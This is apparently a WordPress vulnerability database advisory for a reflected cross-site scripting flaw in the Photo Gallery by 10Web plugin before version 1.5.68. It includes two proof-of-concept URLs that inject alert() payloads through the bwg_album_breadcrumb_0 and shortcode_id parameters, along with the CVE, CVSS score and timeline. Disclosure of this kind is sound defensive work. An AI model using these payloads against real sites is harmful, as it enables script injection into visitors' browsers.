WordPress Plugin Vulnerabilities

Photo Gallery by 10Web < 1.5.68 - Reflected Cross-Site Scripting (XSS)

Description

The plugin is vulnerable to Reflected Cross-Site Scripting (XSS) issues via the bwg_album_breadcrumb_0 and shortcode_id GET parameters passed to the bwg_frontend_data AJAX action

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_breadcrumb_0=[{"id":"1'><img/src=x onerror=alert(1)>","page":1},{"id":"1","page":1}]&gallery_type=album_extended_preview

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_type=image_browser&gallery_id=1&tag=0&album_id=0&theme_id=1&shortcode_id=1%22%20onmouseover=alert(id)//

Affects Plugins

Plugin icon
photo-gallery
Fixed in 1.5.68

References

CVE
CVE-2021-25041
URL
https://packetstormsecurity.com/files/#162227/
URL
https://plugins.trac.wordpress.org/changeset/2467205

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
ThuraMoeMyint
Verified
Yes
WPVDB ID
32aee3ea-e0af-44da-a16c-102c83eaed8f

Timeline

Publicly Published
2021-02-03 (about 2 years ago)
Added
2021-02-04 (about 2 years ago)
Last Updated
2022-04-11 (about 1 years ago)

Other

Published
Title
Published
2023-08-30
Title
Easy Admin Menu <= 1.3 - Admin+ Stored XSS
Published
2014-08-01
Title
Uploadify Integration 0.9.6 - Multiple Cross Site Scripting Vulnerabilities
Published
2015-01-25
Title
WP SlimStat <= 3.9.2 - Stored Cross-Site Scripting (XSS)
Published
2023-08-11
Title
WP 404 Auto Redirect to Similar Post <= 1.0.3 - Admin+ Stored XSS
Published
2014-08-01
Title
fGallery_Plus - fim_rss.php album Parameter Reflected XSS